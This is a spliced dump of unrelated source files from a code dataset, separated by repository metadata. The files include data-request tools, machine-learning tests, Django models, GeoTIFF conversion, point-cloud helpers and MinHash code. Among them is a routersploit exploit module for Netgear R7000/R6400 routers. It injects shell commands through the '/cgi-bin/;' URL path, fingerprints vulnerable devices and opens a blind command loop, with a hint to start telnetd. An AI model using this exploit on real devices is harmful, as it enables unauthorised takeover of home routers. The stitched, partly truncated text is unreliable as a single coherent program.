"MIT"
] | null | null | null | tools/request_sender.py | gusutabopb/pytrthree | 6c036e6ba44793261dea6017091423af3624050c | [
"MIT"
] | 1 | 2020-10-18T16:17:08.000Z | 2020-10-18T16:17:08.000Z | #!/usr/bin/env python
import argparse
import datetime
import pandas as pd
import yaml
from pytrthree import TRTH
from pytrthree.utils import retry
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Tool to send a series of requests to TRTH.')
parser.add_argument('--config', action='store', type=argparse.FileType('r'), required=True,
help='TRTH API configuration (YAML file)')
parser.add_argument('--template', action='store', type=argparse.FileType('r'), required=True,
help='Base template for the requests (YAML file)')
parser.add_argument('--criteria', action='store', type=argparse.FileType('r'), required=True,
help='Criteria for searching RICs and modifying queried fields (YAML file)')
parser.add_argument('--start', action='store', type=str, required=True,
help='Start date (ISO-8601 datetime string)')
parser.add_argument('--end', action='store', type=str, default=str(datetime.datetime.now().date()),
help='End date (ISO-8601 datetime string). Default to today\'s date.')
parser.add_argument('--group', action='store', type=str, default='1A',
help='Pandas datetime frequency string for grouping requests. Defaults to "1A".')
args = parser.parse_args()
api = TRTH(config=args.config)
api.options['raise_exception'] = True
criteria = yaml.load(args.criteria)
template = yaml.load(args.template)
dates = pd.date_range(args.start, args.end).to_series()
dateranges = [parse_daterange(i) for _, i in dates.groupby(pd.TimeGrouper(args.group))]
for daterange in dateranges:
for name, crit in criteria.items():
request = make_request(daterange, crit)
rid = retry(api.submit_ftp_request, request, sleep=30, exp_base=2)
api.logger.info(rid['requestID'])
api.logger.info('All requests sent!')
| 47.105263 | 105 | 0.660708 | #!/usr/bin/env python
import argparse
import datetime
import pandas as pd
import yaml
from pytrthree import TRTH
from pytrthree.utils import retry
def make_request(daterange, criteria):
request = api.factory.LargeRequestSpec(**template)
short_dates = sorted([x.replace('-', '') for x in daterange.values()])
search_result = api.search_rics(daterange, criteria['ric'], refData=False)
ric_list = [{'code': i['code']} for i in search_result]
request['friendlyName'] = '{}-{}_{}'.format(name, *short_dates)
request['instrumentList']['instrument'] = ric_list
request['dateRange'] = daterange
if 'fields' in criteria:
request['messageTypeList']['messageType'][0]['fieldList']['string'] = criteria['fields']
return request
def parse_daterange(s):
return dict(start=str(s.iloc[0].date()), end=str(s.iloc[-1].date()))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Tool to send a series of requests to TRTH.')
parser.add_argument('--config', action='store', type=argparse.FileType('r'), required=True,
help='TRTH API configuration (YAML file)')
parser.add_argument('--template', action='store', type=argparse.FileType('r'), required=True,
help='Base template for the requests (YAML file)')
parser.add_argument('--criteria', action='store', type=argparse.FileType('r'), required=True,
help='Criteria for searching RICs and modifying queried fields (YAML file)')
parser.add_argument('--start', action='store', type=str, required=True,
help='Start date (ISO-8601 datetime string)')
parser.add_argument('--end', action='store', type=str, default=str(datetime.datetime.now().date()),
help='End date (ISO-8601 datetime string). Default to today\'s date.')
parser.add_argument('--group', action='store', type=str, default='1A',
help='Pandas datetime frequency string for grouping requests. Defaults to "1A".')
args = parser.parse_args()
api = TRTH(config=args.config)
api.options['raise_exception'] = True
criteria = yaml.load(args.criteria)
template = yaml.load(args.template)
dates = pd.date_range(args.start, args.end).to_series()
dateranges = [parse_daterange(i) for _, i in dates.groupby(pd.TimeGrouper(args.group))]
for daterange in dateranges:
for name, crit in criteria.items():
request = make_request(daterange, crit)
rid = retry(api.submit_ftp_request, request, sleep=30, exp_base=2)
api.logger.info(rid['requestID'])
api.logger.info('All requests sent!')
| 666 | 0 | 46 |
0ddfbadbbe65167ee077658fdcdc1211bdb095b7 | 1,789 | py | Python | Logistic_Regression/tests/test_logistic_regression.py | hectorLop/ML_algorithms | 0c5181e460640efc7e81210cf132f3bbd9d73910 | [
"MIT"
] | null | null | null | Logistic_Regression/tests/test_logistic_regression.py | hectorLop/ML_algorithms | 0c5181e460640efc7e81210cf132f3bbd9d73910 | [
"MIT"
] | null | null | null | Logistic_Regression/tests/test_logistic_regression.py | hectorLop/ML_algorithms | 0c5181e460640efc7e81210cf132f3bbd9d73910 | [
"MIT"
] | null | null | null | import pytest
import numpy as np
from sklearn import datasets
from Logistic_Regression.logistic_regression import LogisticRegression
@pytest.fixture
def test_logistic_regression(train_test_data_final):
"""
Tests the linear regression algorithm using the Normal Equation
"""
X_train, y_train = train_test_data_final
X_train, y_train = X_train[:, 3:], (y_train == 2).astype(np.int8).reshape(-1, 1) # Binary classification problem
X_test, y_test = np.array([[1.7], [1.5]]), np.array([[1], [0]])
log_reg = LogisticRegression(n_iterations=5000, batch_size=32)
log_reg.fit(X_train, y_train)
y_pred = log_reg.predict(X_test)
assert isinstance(y_pred, np.ndarray)
assert len(y_pred) > 0
assert y_pred.shape[0] == X_test.shape[0]
assert np.array_equal(y_test, y_pred)
| 30.844828 | 117 | 0.693684 | import pytest
import numpy as np
from sklearn import datasets
from Logistic_Regression.logistic_regression import LogisticRegression
@pytest.fixture
def train_test_data_final():
iris = datasets.load_iris()
X = iris['data']
y = iris['target']
return X, y
def test_logistic_regression(train_test_data_final):
"""
Tests the linear regression algorithm using the Normal Equation
"""
X_train, y_train = train_test_data_final
X_train, y_train = X_train[:, 3:], (y_train == 2).astype(np.int8).reshape(-1, 1) # Binary classification problem
X_test, y_test = np.array([[1.7], [1.5]]), np.array([[1], [0]])
log_reg = LogisticRegression(n_iterations=5000, batch_size=32)
log_reg.fit(X_train, y_train)
y_pred = log_reg.predict(X_test)
assert isinstance(y_pred, np.ndarray)
assert len(y_pred) > 0
assert y_pred.shape[0] == X_test.shape[0]
assert np.array_equal(y_test, y_pred)
def test_logistic_regression_softmax(train_test_data_final):
X_train, y_train = train_test_data_final
X_train = X_train[:, 2:]
X_test, y_test = np.array([[5, 2]]), np.array([2])
log_reg = LogisticRegression(n_iterations=5000, batch_size=32)
log_reg.fit(X_train, y_train)
y_pred = log_reg.predict(X_test)
assert isinstance(y_pred, np.ndarray)
assert len(y_pred) > 0
assert y_pred.shape[0] == X_test.shape[0]
assert np.array_equal(y_test, y_pred)
def test_logistic_regression_softmax_loss(train_test_data_final):
X_train, y_train = train_test_data_final
X_train = X_train[:, 2:]
log_reg = LogisticRegression(n_iterations=5000, batch_size=32)
log_reg.fit(X_train, y_train)
training_loss = log_reg._loss
assert training_loss | 876 | 0 | 72 |
2664c817d15259cca23b6839c61cc8482c807f64 | 176 | py | Python | blogposts/admin.py | prithaupadhyay/code-talk | 1140e78d128c7cf7f7cf08039f3310bcd7cf0a52 | [
"MIT"
] | null | null | null | blogposts/admin.py | prithaupadhyay/code-talk | 1140e78d128c7cf7f7cf08039f3310bcd7cf0a52 | [
"MIT"
] | null | null | null | blogposts/admin.py | prithaupadhyay/code-talk | 1140e78d128c7cf7f7cf08039f3310bcd7cf0a52 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Question
from .models import Answer
# Register your models here
admin.site.register(Question)
admin.site.register(Answer)
| 22 | 32 | 0.818182 | from django.contrib import admin
from .models import Question
from .models import Answer
# Register your models here
admin.site.register(Question)
admin.site.register(Answer)
| 0 | 0 | 0 |
8c8f006b0635abe2b91d69c825cc97f2272505a5 | 1,605 | py | Python | tests/test_util.py | ecohealthalliance/concept-tools | 865a7ceb94ca8d927eb9a7ed53fcb6c1e1a68f53 | [
"Apache-2.0"
] | null | null | null | tests/test_util.py | ecohealthalliance/concept-tools | 865a7ceb94ca8d927eb9a7ed53fcb6c1e1a68f53 | [
"Apache-2.0"
] | null | null | null | tests/test_util.py | ecohealthalliance/concept-tools | 865a7ceb94ca8d927eb9a7ed53fcb6c1e1a68f53 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Test the utils"""
import sys
import os
import unittest
sys.path = ['./'] + sys.path
from util import is_meta
from util import get_canonical_id_from_url_segment
from util import get_canonical_id_from_title
if __name__ == '__main__':
unittest.main()
| 25.078125 | 74 | 0.493458 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Test the utils"""
import sys
import os
import unittest
sys.path = ['./'] + sys.path
from util import is_meta
from util import get_canonical_id_from_url_segment
from util import get_canonical_id_from_title
class UtilTest(unittest.TestCase):
def test_is_meta(self):
kinds = ['List_of_',
'Meta:',
'Help:',
'Template:',
'Talk:',
'User_talk:',
'User:',
'Portal:',
'Category:',
'MediaWiki:',
'Wikipedia:',
'File:',
'Book:',
'Draft:',
'Education_Program:',
'TimedText:',
'Module:',
'WP:',
'H:',
'CAT:',
'WT:',
'MOS:',
'Wikipedia_talk:',
'Special:',
'Transwiki:']
for kind in kinds:
self.assertEqual(is_meta(kind + "foo bar zap"), True)
self.assertEqual(is_meta("foo" + kind + "foo bar zap"), False)
def test_get_canonical_id_from_url_segment(self):
segment = 'Champs-%C3%89lys%C3%A9es'
_id = 'Champs-Élysées'
self.assertEqual(_id, get_canonical_id_from_url_segment(segment))
def test_get_canonical_id_from_title(self):
title = 'Middle East'
_id = 'Middle_East'
self.assertEqual(_id, get_canonical_id_from_title(title))
if __name__ == '__main__':
unittest.main()
| 1,183 | 13 | 104 |
11a300dc84861ec3cce363d43775cbd888385cd9 | 3,348 | py | Python | docs/dev/Example4_gdal.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 1,133 | 2022-01-07T21:24:57.000Z | 2022-01-07T21:33:08.000Z | docs/dev/Example4_gdal.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 276 | 2019-02-10T07:18:28.000Z | 2022-03-31T21:45:55.000Z | docs/dev/Example4_gdal.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 235 | 2019-02-10T05:00:53.000Z | 2022-03-18T07:37:24.000Z | #!/usr/bin/env python3
import numpy as np
import argparse
from osgeo import gdal
import isce
import isceobj
import os
def cmdLineParse():
'''
Parse command line.
'''
parser = argparse.ArgumentParser(description='Convert GeoTiff to ISCE file')
parser.add_argument('-i','--input', dest='infile', type=str,
required=True, help='Input GeoTiff file. If tar file is also included, this will be output file extracted from the TAR archive.')
parser.add_argument('-o','--output', dest='outfile', type=str,
required=True, help='Output GeoTiff file')
parser.add_argument('-t','--tar', dest='tarfile', type=str,
default=None, help='Optional input tar archive. If provided, Band 8 is extracted to file name provided with input option.')
return parser.parse_args()
def dumpTiff(infile, outfile):
'''
Read geotiff tags.
'''
###Uses gdal bindings to read geotiff files
data = {}
ds = gdal.Open(infile)
data['width'] = ds.RasterXSize
data['length'] = ds.RasterYSize
gt = ds.GetGeoTransform()
data['minx'] = gt[0]
data['miny'] = gt[3] + data['width'] * gt[4] + data['length']*gt[5]
data['maxx'] = gt[0] + data['width'] * gt[1] + data['length']*gt[2]
data['maxy'] = gt[3]
data['deltax'] = gt[1]
data['deltay'] = gt[5]
data['reference'] = ds.GetProjectionRef()
band = ds.GetRasterBand(1)
inArr = band.ReadAsArray(0,0, data['width'], data['length'])
inArr.astype(np.float32).tofile(outfile)
return data
def extractBand8(intarfile, destfile):
'''
Extracts Band 8 of downloaded Tar file from EarthExplorer
'''
import tarfile
import shutil
fid = tarfile.open(intarfile)
fileList = fid.getmembers()
###Find the band 8 file
src = None
for kk in fileList:
if kk.name.endswith('B8.TIF'):
src = kk
if src is None:
raise Exception('Band 8 TIF file not found in tar archive')
print('Extracting: %s'%(src.name))
####Create source and target file Ids.
srcid = fid.extractfile(src)
destid = open(destfile,'wb')
##Copy content
shutil.copyfileobj(srcid, destid)
fid.close()
destid.close()
if __name__ == '__main__':
####Parse cmd line
inps = cmdLineParse()
####If input tar file is given
if inps.tarfile is not None:
extractBand8(inps.tarfile, inps.infile)
print('Dumping image to file')
meta = dumpTiff(inps.infile, inps.outfile)
# print(meta)
####Create an ISCE XML header for the landsat image
img = isceobj.createDemImage()
img.setFilename(inps.outfile)
img.setDataType('FLOAT')
dictProp = {
'REFERENCE' : meta['reference'],
'Coordinate1': {
'size': meta['width'],
'startingValue' : meta['minx'],
'delta': meta['deltax']
},
'Coordinate2': {
'size' : meta['length'],
'startingValue' : meta['maxy'],
'delta': meta['deltay']
},
'FILE_NAME' : inps.outfile
}
img.init(dictProp)
img.renderHdr()
| 29.368421 | 142 | 0.565114 | #!/usr/bin/env python3
import numpy as np
import argparse
from osgeo import gdal
import isce
import isceobj
import os
def cmdLineParse():
'''
Parse command line.
'''
parser = argparse.ArgumentParser(description='Convert GeoTiff to ISCE file')
parser.add_argument('-i','--input', dest='infile', type=str,
required=True, help='Input GeoTiff file. If tar file is also included, this will be output file extracted from the TAR archive.')
parser.add_argument('-o','--output', dest='outfile', type=str,
required=True, help='Output GeoTiff file')
parser.add_argument('-t','--tar', dest='tarfile', type=str,
default=None, help='Optional input tar archive. If provided, Band 8 is extracted to file name provided with input option.')
return parser.parse_args()
def dumpTiff(infile, outfile):
'''
Read geotiff tags.
'''
###Uses gdal bindings to read geotiff files
data = {}
ds = gdal.Open(infile)
data['width'] = ds.RasterXSize
data['length'] = ds.RasterYSize
gt = ds.GetGeoTransform()
data['minx'] = gt[0]
data['miny'] = gt[3] + data['width'] * gt[4] + data['length']*gt[5]
data['maxx'] = gt[0] + data['width'] * gt[1] + data['length']*gt[2]
data['maxy'] = gt[3]
data['deltax'] = gt[1]
data['deltay'] = gt[5]
data['reference'] = ds.GetProjectionRef()
band = ds.GetRasterBand(1)
inArr = band.ReadAsArray(0,0, data['width'], data['length'])
inArr.astype(np.float32).tofile(outfile)
return data
def extractBand8(intarfile, destfile):
'''
Extracts Band 8 of downloaded Tar file from EarthExplorer
'''
import tarfile
import shutil
fid = tarfile.open(intarfile)
fileList = fid.getmembers()
###Find the band 8 file
src = None
for kk in fileList:
if kk.name.endswith('B8.TIF'):
src = kk
if src is None:
raise Exception('Band 8 TIF file not found in tar archive')
print('Extracting: %s'%(src.name))
####Create source and target file Ids.
srcid = fid.extractfile(src)
destid = open(destfile,'wb')
##Copy content
shutil.copyfileobj(srcid, destid)
fid.close()
destid.close()
if __name__ == '__main__':
####Parse cmd line
inps = cmdLineParse()
####If input tar file is given
if inps.tarfile is not None:
extractBand8(inps.tarfile, inps.infile)
print('Dumping image to file')
meta = dumpTiff(inps.infile, inps.outfile)
# print(meta)
####Create an ISCE XML header for the landsat image
img = isceobj.createDemImage()
img.setFilename(inps.outfile)
img.setDataType('FLOAT')
dictProp = {
'REFERENCE' : meta['reference'],
'Coordinate1': {
'size': meta['width'],
'startingValue' : meta['minx'],
'delta': meta['deltax']
},
'Coordinate2': {
'size' : meta['length'],
'startingValue' : meta['maxy'],
'delta': meta['deltay']
},
'FILE_NAME' : inps.outfile
}
img.init(dictProp)
img.renderHdr()
| 0 | 0 | 0 |
00e322d1a45b6855e615237ad9a73ebedbaae636 | 2,734 | py | Python | DIZED_APPS/INCANTATION/modules/exploits/routers/netgear/r7000_r6400_rce.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | 1 | 2018-10-17T04:49:42.000Z | 2018-10-17T04:49:42.000Z | DIZED_APPS/INCANTATION/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | null | null | null | DIZED_APPS/INCANTATION/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | null | null | null | from routersploit import (
exploits,
print_status,
print_success,
print_error,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netgear R7000 and R6400 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on operating system level.
"""
__info__ = {
'name': 'Netgear R7000 & R6400 RCE',
'description': 'Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is '
'vulnerable, command loop is invoked that allows executing commands on operating system level.',
'authors': [
'Chad Dougherty', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/',
'https://www.exploit-db.com/exploits/40889/',
'http://www.kb.cert.org/vuls/id/582384',
],
'devices': [
'R6400 (AC1750)',
'R7000 Nighthawk (AC1900, AC2300)',
'R7500 Nighthawk X4 (AC2350)',
'R7800 Nighthawk X4S(AC2600)',
'R8000 Nighthawk (AC3200)',
'R8500 Nighthawk X8 (AC5300)',
'R9000 Nighthawk X10 (AD7200)',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port', validators=validators.integer)
@mute
| 35.973684 | 119 | 0.601317 | from routersploit import (
exploits,
print_status,
print_success,
print_error,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netgear R7000 and R6400 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on operating system level.
"""
__info__ = {
'name': 'Netgear R7000 & R6400 RCE',
'description': 'Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is '
'vulnerable, command loop is invoked that allows executing commands on operating system level.',
'authors': [
'Chad Dougherty', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/',
'https://www.exploit-db.com/exploits/40889/',
'http://www.kb.cert.org/vuls/id/582384',
],
'devices': [
'R6400 (AC1750)',
'R7000 Nighthawk (AC1900, AC2300)',
'R7500 Nighthawk X4 (AC2350)',
'R7800 Nighthawk X4S(AC2600)',
'R8000 Nighthawk (AC3200)',
'R8500 Nighthawk X8 (AC5300)',
'R9000 Nighthawk X10 (AD7200)',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port', validators=validators.integer)
def run(self):
if self.check():
print_success("Target is probably vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'")
shell(self, architecture="armle")
else:
print_error("Target is not vulnerable")
def execute(self, cmd):
cmd = cmd.replace(" ", "$IFS")
url = "{}:{}/cgi-bin/;{}".format(self.target, self.port, cmd)
http_request(method="GET", url=url)
return ""
@mute
def check(self):
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="HEAD", url=url)
if response is None:
return False # target is not vulnerable
if "WWW-Authenticate" in response.headers.keys():
if any(map(lambda x: x in response.headers['WWW-Authenticate'], ["NETGEAR R7000", "NETGEAR R6400"])):
return True # target is vulnerable
return False # target is not vulnerable
| 989 | 0 | 80 |
6ba2273aee35bc6f9aba457d1b63e54dd5e5369f | 3,300 | py | Python | test.py | leJson/DRN | 27d7cb3b40d5a760fd7bf9b14b390cbdb08d617b | [
"MIT"
] | 1 | 2021-07-25T13:52:04.000Z | 2021-07-25T13:52:04.000Z | test.py | leJson/DRN | 27d7cb3b40d5a760fd7bf9b14b390cbdb08d617b | [
"MIT"
] | null | null | null | test.py | leJson/DRN | 27d7cb3b40d5a760fd7bf9b14b390cbdb08d617b | [
"MIT"
] | null | null | null | import json
import numpy as np
import open3d as o3d
if __name__ == '__main__':
mse_cal()
# read_pcd_pointclouds()
# show_gd()
# file_path = '/home/ljs/workspace/eccv/FirstTrainingData/out_4096/train/38.pcd'
# read_pcd_pointclouds(file_path)
| 28.947368 | 84 | 0.646061 | import json
import numpy as np
import open3d as o3d
def json_load(filename):
with open(filename, "r") as fr:
vars = json.load(fr)
# for k, v in vars.items():
# vars[k] = np.array(v)
return vars
def _show_gd():
path = '/home/ljs/workspace/eccv/FirstTrainingData/label/GroundTruth.json'
index = '50'
contxt = json_load(path)
print(contxt)
contxt = contxt['Measurements']
print(contxt)
print(100*'*')
item = 'Image%s' % index
print(contxt[item])
print(contxt[item]['Variety'])
print(contxt[item]['RGBImage'])
print(contxt[item]['DebthInformation'])
print(contxt[item]['FreshWeightShoot'])
print(contxt[item]['DryWeightShoot'])
print(contxt[item]['Height'])
print(contxt[item]['Diameter'])
print(contxt[item]['LeafArea'])
pass
def show_gd():
path = '/home/ljs/workspace/eccv/FirstTrainingData/label/GroundTruth.json'
index = '50'
per_label = list()
contxt = json_load(path)
print(contxt)
contxt = contxt['Measurements']
print(contxt)
print(100*'*')
item = 'Image%s' % index
print(contxt[item])
print(contxt[item]['Variety'])
print(contxt[item]['RGBImage'])
print(contxt[item]['DebthInformation'])
print(contxt[item]['FreshWeightShoot'])
print(contxt[item]['DryWeightShoot'])
print(contxt[item]['Height'])
print(contxt[item]['Diameter'])
print(contxt[item]['LeafArea'])
per_label.append(contxt[item]['FreshWeightShoot'])
per_label.append(contxt[item]['DryWeightShoot'])
per_label.append(contxt[item]['Height'])
per_label.append(contxt[item]['Diameter'])
per_label.append(contxt[item]['LeafArea'])
return per_label
# pass
def read_Label(path):
path = '/home/ljs/workspace/eccv/FirstTrainingData/label/GroundTruth.json'
index = '50'
contxt = json_load(path)
print(contxt)
contxt = contxt['Measurements']
return contxt
# print(contxt)
# print(100*'*')
# item = 'Image%s' % index
# print(contxt[item])
# print(contxt[item]['Variety'])
# print(contxt[item]['RGBImage'])
# print(contxt[item]['DebthInformation'])
# print(contxt[item]['FreshWeightShoot'])
# print(contxt[item]['DryWeightShoot'])
# print(contxt[item]['Height'])
# print(contxt[item]['Diameter'])
# print(contxt[item]['LeafArea'])
# pass
def read_pcd_pointclouds(file_path):
# file_path = '/home/ljs/workspace/eccv/FirstTrainingData/out_4096/train/38.pcd'
pcd = o3d.io.read_point_cloud(file_path)
point_cloud = np.asarray(pcd.points)
# color_cloud = np.asarray(pcd.colors)*255
color_cloud = np.asarray(pcd.colors)
points = np.concatenate([point_cloud, color_cloud], axis=1)
# print(point_cloud.shape)
# print(color_cloud.shape)
print(points.shape)
return points
# print(color_cloud)
# np.savetxt('38.txt', points, fmt='%10.8f') # Keep 8 decimal places
# pass
def mse_cal():
a = np.asarray([[1,2,4], [2,3,5]])
b = np.asarray([[0,0,4], [2,3,5]])
# print(a.shape)
print((a-b)*(a-b))
if __name__ == '__main__':
mse_cal()
# read_pcd_pointclouds()
# show_gd()
# file_path = '/home/ljs/workspace/eccv/FirstTrainingData/out_4096/train/38.pcd'
# read_pcd_pointclouds(file_path)
| 2,894 | 0 | 138 |
f7e3d925b7c1ac732ec83c398d423d152de0d348 | 315 | py | Python | stream_framework/feeds/memory.py | amitpatra/Stream-Framework | 2c40d537fc5a8b3d721060f33b817fb0ca5ec2ee | [
"BSD-3-Clause"
] | 3,964 | 2015-01-01T04:20:20.000Z | 2022-03-27T06:29:41.000Z | stream_framework/feeds/memory.py | amitpatra/Stream-Framework | 2c40d537fc5a8b3d721060f33b817fb0ca5ec2ee | [
"BSD-3-Clause"
] | 123 | 2015-01-02T10:12:22.000Z | 2022-02-24T04:48:38.000Z | stream_framework/feeds/memory.py | amitpatra/Stream-Framework | 2c40d537fc5a8b3d721060f33b817fb0ca5ec2ee | [
"BSD-3-Clause"
] | 536 | 2015-01-02T06:16:50.000Z | 2022-03-07T15:40:45.000Z | from stream_framework.feeds.base import BaseFeed
from stream_framework.storage.memory import InMemoryActivityStorage
from stream_framework.storage.memory import InMemoryTimelineStorage
| 35 | 67 | 0.869841 | from stream_framework.feeds.base import BaseFeed
from stream_framework.storage.memory import InMemoryActivityStorage
from stream_framework.storage.memory import InMemoryTimelineStorage
class Feed(BaseFeed):
timeline_storage_class = InMemoryTimelineStorage
activity_storage_class = InMemoryActivityStorage
| 0 | 106 | 23 |
1406ecd917ed3d4abcb32d216404ddeddc169ba6 | 4,149 | py | Python | global_sewage_signatures/MinHash.py | josl/global-sewage-signatures | f4d314616706f2ff7d437a258d16c7ce5df64bfd | [
"MIT"
] | null | null | null | global_sewage_signatures/MinHash.py | josl/global-sewage-signatures | f4d314616706f2ff7d437a258d16c7ce5df64bfd | [
"MIT"
] | null | null | null | global_sewage_signatures/MinHash.py | josl/global-sewage-signatures | f4d314616706f2ff7d437a258d16c7ce5df64bfd | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of global_sewage_signatures.
# https://github.com/josl/Global_Sewage_Signatures
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2016, Jose L. Bellod Cisneros & Kosai Al-Nakked
# <bellod.cisneros@gmail.com & kosai@cbs.dtu.dk>
import numpy as np
import math
from collections import defaultdict
# We keep a global count of all coefficients for the Universal Hashing to
# have unique set of numbers
coefficients = set()
# Reference: http://www.mmds.org/mmds/v2.1/ch03-lsh.pdf
# Each permutation is applied to all the rows and we update the signature
# matrix based on the column with the minimum hash found so far
# All-against-all comparison of the signature matrix result of the
# permutation. We compare each signature for each document and group
# similar items together if their jaccard similarity is less than the
# distance provided
| 37.044643 | 77 | 0.626175 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of global_sewage_signatures.
# https://github.com/josl/Global_Sewage_Signatures
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2016, Jose L. Bellod Cisneros & Kosai Al-Nakked
# <bellod.cisneros@gmail.com & kosai@cbs.dtu.dk>
import numpy as np
import math
from collections import defaultdict
# We keep a global count of all coefficients for the Universal Hashing to
# have unique set of numbers
coefficients = set()
class HashPermutation():
global coefficients
def __init__(self, N, p=None):
self.p = p
self.a, self.b = self.get_coefficients()
self.N = N
def get_coefficients(self):
a = np.random.randint(1, self.p, size=1)[0]
b = np.random.randint(0, self.p, size=1)[0]
if (a, b) in coefficients:
return self.get_coefficients()
coefficients.add((a, b))
return (a, b)
# We find a random prime number required by the Universal Hashing method
def random_prime(n):
for random_n in range(n * 500, n * 2000):
if random_n <= 1:
continue
else:
for i in range(2, int(np.sqrt(random_n)) + 1, 2):
if random_n % i == 0:
break
if random_n % i == 0:
continue
return random_n
# Universal Hashing based on modular arithmetic:
# a and b are random coefficients and p is a prime number fixed for all
# Hashing functions. N is the number of rows we are hashing and the
# module allows us to wrap our result (the permutation) around the number
# of rows.
def hash(self, x):
return (((self.a * x) + self.b) % self.p) % self.N
class MinHash():
# Reference: http://www.mmds.org/mmds/v2.1/ch03-lsh.pdf
def __init__(self, dist, sparse_matrix, k_permutations):
global coefficients
self.dist = dist
self.sparse_matrix = sparse_matrix
self.point_set = {}
self.point_dict = {}
self.k_permutations = k_permutations
self.dimensions = self.sparse_matrix.shape[1]
self.n_points = self.sparse_matrix.shape[0]
# Initialization of the matrix of signatures
self.signatures = [
np.array([math.inf for i in range(0, self.k_permutations)])
for j in range(0, self.n_points)
]
self.neighbors = defaultdict(set)
self.hash_permutations = []
# Initialization of the k hashing functions. All functions share the
# same prime number but different coefficients
p = HashPermutation.random_prime(self.n_points)
for k in range(0, self.k_permutations):
perm = HashPermutation(self.n_points, p)
self.hash_permutations.append(perm.hash)
self.permutations = {}
def signature_distance(self, a, b):
intersect = (a == b).sum()
return intersect / self.k_permutations
# Each permutation is applied to all the rows and we update the signature
# matrix based on the column with the minimum hash found so far
def createMinHash(self):
for col_j in range(0, self.n_points):
for sign_i, hash_func in enumerate(self.hash_permutations):
for row_i in self.sparse_matrix[col_j].indices:
hash_row = hash_func(row_i)
if hash_row < self.signatures[col_j][sign_i]:
self.signatures[col_j][sign_i] = hash_row
# All-against-all comparison of the signature matrix result of the
# permutation. We compare each signature for each document and group
# similar items together if their jaccard similarity is less than the
# distance provided
def find_neighbors(self):
for index_a, point_a in enumerate(self.signatures):
for index_b, point_b in enumerate(self.signatures):
dist = 1 - self.signature_distance(point_a, point_b)
if dist <= self.dist:
self.neighbors[index_a].add(index_b)
| 2,507 | 501 | 152 |
2e1c3e6f0e44cfdaf234da9e9952911db70a62dc | 10,021 | py | Python | apps/sso/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
] | 3 | 2021-05-16T17:06:57.000Z | 2021-05-28T17:14:05.000Z | apps/sso/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
] | null | null | null | apps/sso/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
] | null | null | null | import logging
import os
import re
import uuid
from io import BytesIO
from mimetypes import guess_extension
from os.path import splitext
from PIL import Image
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.core.validators import RegexValidator
from django.db import models
from django.db.models import fields
from django.forms import forms
from django.forms.models import model_to_dict
from django.utils.crypto import get_random_string
from django.utils.text import get_valid_filename
from django.utils.translation import gettext_lazy as _
from l10n.models import Country, AdminArea
logger = logging.getLogger(__name__)
def ensure_single_primary(queryset):
"""
ensure that at most one item of the queryset is primary
"""
primary_items = queryset.filter(primary=True)
if primary_items.count() > 1:
for item in primary_items[1:]:
item.primary = False
item.save()
elif primary_items.count() == 0:
item = queryset.first()
if item:
item.primary = True
item.save()
class AddressMixin(models.Model):
"""
Address information
see i.e. http://tools.ietf.org/html/draft-ietf-scim-core-schema-03 or http://schema.org/PostalAddress
"""
addressee = models.CharField(_("addressee"), max_length=80)
street_address = models.TextField(_('street address'), blank=True,
help_text=_('Full street address, with house number, street name, P.O. box, and '
'extended street address information.'), max_length=512)
city = models.CharField(_("city"), max_length=100) # , help_text=_('City or locality')
city_native = models.CharField(_("city in native language"), max_length=100, blank=True)
postal_code = models.CharField(_("postal code"), max_length=30, blank=True)
country = models.ForeignKey(Country, on_delete=models.CASCADE, verbose_name=_("country"),
